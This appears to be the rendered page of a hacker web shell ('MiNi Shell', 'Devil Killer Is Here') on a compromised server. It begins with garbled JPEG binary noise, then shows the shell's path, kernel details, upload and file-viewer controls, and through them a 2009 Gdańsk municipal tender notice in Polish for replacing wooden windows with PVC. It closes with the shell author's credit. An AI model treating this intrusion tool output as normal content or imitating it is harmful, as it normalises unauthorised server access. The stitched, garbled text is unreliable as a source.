JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090911/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090911/315970-N-2009.html

<p class="kh_header"><b>Gdańsk: NA WYMIANĘ STOLARKI OKIENNEJ DREWNIANEJ NA STOLARKĘ Z PCV W MIESZKANIACH BĘDĄCYCH WŁASNOŚCIĄ GMINY GDAŃSK W RAMACH REWITALIZACJI DZIELNICY LETNICA</b><br>
<b>Numer ogłoszenia: 315970 - 2009; data zamieszczenia: 11.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gdański Zarząd Nieruchomości Komunalnych - Zakład Budżetowy , ul. Partyzantów 74, 80-254 Gdańsk, woj. pomorskie, tel. 058 5241060-61,63-64, 5241010, faks 058 3458235.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gznk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> NA WYMIANĘ STOLARKI OKIENNEJ DREWNIANEJ NA STOLARKĘ Z PCV W MIESZKANIACH BĘDĄCYCH WŁASNOŚCIĄ GMINY GDAŃSK W RAMACH REWITALIZACJI DZIELNICY LETNICA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wymiana stolarki okiennej obejmująca  wymianę drewnianej stolarki okiennej na stolarkę okienną z PCV  kolor biały z szybami zespolonymi z wbudowanymi wewnętrznymi nawiewnikami ciśnieniowymi o automatycznie  regulowanym stopniu nawiewu  w części wykonanych  okien wraz z podokiennikami z PCV lub z płyt HDF laminowanych o średniej szerokości 0,3 m i długości odpowiadającej szerokości okna oraz parapetów blaszanych  zewnętrznych o szerokości 0,25 m, zgodnie z wymaganiami Referatu Ochrony Zabytków WUAiOZ  tj:
- zachowanie oryginalnego kształtu oraz sposobu konstrukcji stolarki historycznej,
- zastosowanie jednorodnego systemu stolarki dla całego zamierzenia inwestycyjnego, respektującego grubość profili okiennych występujących w rozwiązaniach historycznych. <br>

Zakres robót obejmuje:<br>
-wykucie podokienników<br>
-wykucie  stolarki okiennej <br>
-zerwanie parapetów zewnętrznych z blachy<br>
-obsadzenie stolarki okiennej wraz z regulacją i nawiewnikiem<br>
- uszczelnienie styków ościeżnicy z murem<br>
- obsadzenie podokienników<br>
- obrobienie  ościeży do lica muru<br>
- założenie parapetów zewnętrznych<br>
- przemurowanie otworów okiennych<br>
- wykonanie nadproży<br>
- wykonanie węgarków<br>
-wykucie otworu okiennego<br>

Całkowita ilość okien do wymiany 356szt. o powierzchni  438,07 m 2<br>

W wyniku  uzgodnień z Referatem Ochrony Zabytków WUAiOZ  należy zastosować profile typu:<br>
- TROCAL INNO 70A5 (półzlicowane) dla ZADANIA 1<br>
- IDEAL 4000 (półzlicowane) dla ZADANIA 2<br>
Dopuszcza się stosowanie profili równoważnych.<br>
Profile równoważne muszą posiadać identyczne wymiary zewnętrzne i parametry techniczne nie gorsze, niż opisane  poniżej.  <br>
<br>	
Parametry techniczne stolarki z PCV<br>
- współczynnik  infiltracji powietrza A= 0,5 - 1  [m3 / m*h*da pa 2/3](dla budynków z wentylacją 	grawitacyjną). 	Współczynnik infiltracji dotyczy samego okna i określa warunki techniczne, jakie powinna spełniać stolarka bez nawiewnika, <br>
- współczynnik  akustyczny  Rw=30-35[dB],<br>
- nawiewniki wewnętrzne ciśnieniowe o automatycznie regulowanym stopniu nawiewu w górnej części skrzydła lub w ościeżnicy, które należy montować według zasady 1 szt. nawiewnika na 20 m2 powierzchni pomieszczenia. Nie należy montować nawiewników w pomieszczeniach łazienek, wc oraz kuchniach nie wyposażonych w piece gazowe grzewcze,<br>
-ilość komór w profilu minimum 5, <br>
- kolor profili - biały<br>
- parapety zewnętrzne i wewnętrzne. <br>
Zewnętrzne - blacha ocynkowana gr 0,55 cm o średniej szerokości 25 cm <br>
Wewnętrzne - z PCV lub płyt HDF laminowanych o średniej szerokości  30 cm.<br>
-Szyby okienne - 	dwuszybowe zespolone wypełnione argonem o współczynniku Umniejszym lub równym 1,1 W/(m2*K),liczonym wg normy PN-EN 674 z 1999 r.  potwierdzony atestem.<br>
- Okucia wg zasad określonych przez producenta.<br>

Szczegółowy opis przedmiotu zamówienia stanowią :<br>
- Wykaz adresowy stolarki okiennej do wymiany przedstawiony w Formularzach cenowych zadanie 1 i  zadanie 2- załącznik nr  1 do siwz, <br>
- Rysunki okien Zadanie 1 i Zadanie 2 - załącznik nr 2 do siwz,<br>
- Specyfikacja techniczna i wykonania odbioru - Załącznik nr 3 do siwz,<br>
- Wzory profili dla zadnia 1 i 2 -  załącznik nr 4 do siwz.<br>

UWAGA:<br>
- Ze względu na stan techniczny budynków, kostrukcję szachulcową, mur pruski, grubość ścian na 1c, zwietrzenie zaprawy w niektórych otworach okiennych, brak nadproży, węgarków, występuje konieczność napraw i przemurowania otworów okiennych oraz wykonania lub wymiany nadproży okiennych, węgarków. W niektórych mieszkaniach lokatorzy zamurowali istniejące otwory, które zgodnie z opinią Konserwatora należy przywrócić do stanu pierwotnego. Każdy oferent zobowiązany jest do wizji na obiektach w których będzie wymieniana stolarka okienna i określenia kosztów wymiany okna wraz z robotami dodatkowymi. Wizje winny być przeprowadzone w obecności inspektora nadzoru, albo osoby upoważnionej przez Kierownika BOM nr 9<br>
- 	Nie przewiduje się zapewnienia lokali zastępczych dla lokatorów na czas trwania remontu. Prace wykonywane będą przy zasiedleniu.<br>
WYKONAWCA ZOBOWIĄZANY JEST DO UDOKUMENTOWANIA WYWOZU GRUZU I INNYCH ODPADÓW ZGODNIE Z PRZEPISAMI USTAWY O ODPADACH.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.42.10.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 10 000,00 ZŁ W TYM:
ZADANIE 1- 6 000,00
ZADANIE 2- 4 000,00<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Opis warunków udziału w postępowaniu(z uwzględnieniem ich znaczenia, jeżeli dotyczy) oraz opis sposobu dokonywania oceny spełniania tych warunków:
Wykonawca ubiegający się o udzielenie zamówienia musi: <br>
­- posiadać uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;<br>

- posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,<br>

­- znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;<br>

- nie podlegać wykluczeniu z postępowania o udzielenie zamówienia,<br>

­- udzielić co najmniej 3 letniej gwarancji i 3 letniej rękojmi,<br>

­- wskazać części zamówienia, których wykonanie wykonawca zamierza powierzyć podwykonawcom,<br>

­- przy wykonywaniu przedmiotu zamówienia stosować wyroby budowlane wprowadzone do obrotu zgodnie z przepisami odrębnymi (art. 10 ustawy z dnia 7 lipca 1994 r. prawo budowlane, tekst jednolity Dz. U. z 2003 r. Nr 207 poz. 2016 z późn. zm.). Dokumenty potwierdzające wprowadzenie do obrotu należy przedstawić do wglądu w trakcie realizacji, a komplet przekazać przed odbiorem końcowym,<br>


W celu potwierdzenia, że wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym, a także osobami zdolnymi do wykonania zamówienia, zamawiający żąda: <br>

Doświadczenia zawodowego- wykazu wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie.<br>

Wykaz musi zawierać: Wykaz musi zawierać minimum 1 robotę budowlaną polegającą na wymianie stolarki okiennej popartą dokumentem potwierdzającym, że robota ta została wykonana należycie.<br>

W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, w/w warunek musi spełniać co najmniej jeden wykonawca.<br>


Potencjału kadrowego - wykazu osób którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności i przedstawienia pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie wykonawca wskazał osoby, którymi będzie dysponował.<br>

W przypadku składania oferty na zadanie 1 i 2 wymagane jest wykazanie:<br>

-1 osoby, na stanowisku kierownika budowy posiadającej uprawnienia budowlane wykonawcze w specjalności konstrukcyjno-budowlanej i przynależącej do Izby Inżynierów Budownictwa.<br>

Do oferty należy dołączyć kopie uprawnień i aktualne zaświadczenie o przynależności do Izby Inżynierów Budownictwa.<br>

W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, w/w warunek musi spełniać co najmniej jeden wykonawca.<br>

W celu potwierdzenia, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, zamawiający żąda:<br>

Polisy a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości co najmniej 200 000 zł na każde zadanie. (np. w przypadku składania oferty na 2 zadania wartość polisy musi wynosić minimum 400 000 zł).
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagany dokument musi być złożony przez co najmniej jednego wykonawcę.<br>


Wykonawca ubiegający się o zamówienie publiczne zobowiązany jest:<br>

Złożyć Druk OFERTA, który należy sporządzić wg wzoru druku  zamawiającego.<br>

a)	Określić następujące parametry : na Zadanie 1 i 2 <br>

- 	ilość komór w profilu <br>

-	współczynnik  przenikania ciepła dla szyb zespolonych  U<br>

-	Określić rodzaj zastosowanego  nawiewnika wewnętrznego ciśnieniowego.<br>

-	W przypadku zastosowania profili równoważnych załączyć do oferty opis zastosowanych profili wraz z parametrami technicznymi. Wykonawca jest zobowiązany wykazać, że oferowane przez niego profile spełniają wymagania określone przez Zamawiającego w pkt 1 SIWZ.<br>

-	Złożyć oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 ustawy prawo zamówień publicznych.<br>

-	Złożyć Formularze cenowe: Wymiana stolarki okiennej na stolarkę z PCV ZAŁĄCZNIK NR 1  ZADANIE 1; Wymiana stolarki okiennej na stolarkę z PCV ZAŁĄCZNIK NR 1 ZADANIE 2, które należy sporządzić wg wzoru druków Zamawiającego odpowiednio  na wybrane przez siebie zadania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, zamawiający żąda, aby Wykonawca załączył do oferty następujące dokumenty:
1) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, (wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert)
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagany dokument musi być złożony przez  każdego wykonawcę.
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 1 - składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokument, o których mowa wyżej powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się w/w dokumentu, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Oświadczenie powinno być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.gznk.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 80-254 Gdańsk, ul Partyzantów 74, pok. nr 5 w godz. 8:00 - 12:00. Cena brutto - 24,40 zł
Warunki i sposób płatności: gotówka, zaliczenie pocztowe.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.10.2009 godzina 10:00, miejsce: siedziba Zamawiającego, pok. nr 9, kancelaria..</p><p><b>IV.3.5) Termin związania ofertą:</b> do 01.11.2009.</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W celu potwierdzenia, że oferowane roboty budowlane odpowiadają wymaganiom określonym przez zamawiającego, zamawiający żąda na zastosowaną stolarkę: <br>
- aprobaty wydanej przez uprawniony podmiot, zgodnie z ustawą z dnia 16 kwietnia 2004 r. o wyrobach budowlanych (Dz. U. 92 poz. 881) i przepisami wykonawczymi do tej ustawy. <br>
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagany dokument musi być złożony przez co najmniej jednego wykonawcę,<br>
-atestu na zastosowane szyby okienne potwierdzające współczynnik przenikania ciepła zgodnie z normą PN-EN674 z 1999 r.
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagany dokument musi być złożony przez co najmniej jednego wykonawcę,<br>

WARUNKI ZMIAN POSTANOWIEŃ UMOWY.<br>
Następujące postanowienia umowy mogą ulec zmianie:<br>
Przesunięciu może ulec termin wykonania przedmiotu zamówienia.  <br>
Zmiany w umowie mogą zostać wprowadzone przy zaistnieniu następujących okoliczności: <br>
1. Termin może ulec przesunięciu w przypadku wystąpienia niekorzystnych warunków  atmosferycznych, tj. ciągłych opadów deszczu lub silnych wiatrów. <br>
2. Konieczności wykonania  niezbędnych robót  dodatkowych, których wykonanie będzie  ograniczało możliwość kontynuowania robót podstawowych.<br>
3. Termin może ulec przesunięciu o ilość dni występowania wyżej wymienionych warunków  atmosferycznych i ilość dni wykonywania robót dodatkowych. <br>

DATA, GODZINA I MIEJSCE OTWARCIA OFERT 02.10.2009 r. godz.10:15 w siedzibie zamawiającego, pokój 204, świetlica<br>
OSOBY UPRAWNIONE DO POROZUMIEWANIA SIĘ Z WYKONAWCAMI Grażyna Pietrowska pok. nr 5 <br>
tel;. 058 524 10 60, nz@gznk. pl.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> WYMIANA STOLARKI OKIENNEJ DREWNIANEJ NA STOLARKĘ Z PCV W MIESZKANIACH BĘDĄCYCH WŁASNOŚCIĄ GMINY GDAŃSK W RAMACH REWITALIZACJI DZIELNICY LETNICA.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymiana stolarki okiennej drewnianej na stolarkę okienną z PCV zgodnie  z wykazem adresowym przedstawionym w Formularzu cenowym Zadanie 1 - załącznik nr  1 do siwz <br>
Całkowita ilość okien do wymiany 225 szt. o powierzchni  280,03 m 2.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.10.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> WYMIANA STOLARKI OKIENNEJ DREWNIANEJ NA STOLARKĘ Z PCV W MIESZKANIACH BĘDĄCYCH WŁASNOŚCIĄ GMINY GDAŃSK W RAMACH REWITALIZACJI DZIELNICY LETNICA.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymiana stolarki okiennej drewnianej na stolarkę okienną z PCV zgodnie z wykazem adresowym przedstawionym w Formularzu cenowym Zadanie 2 - załącznik nr  1 do siwz.<br>
Całkowita ilość okien do wymiany 131 szt. o powierzchni  158, 04 m 2.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.10.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com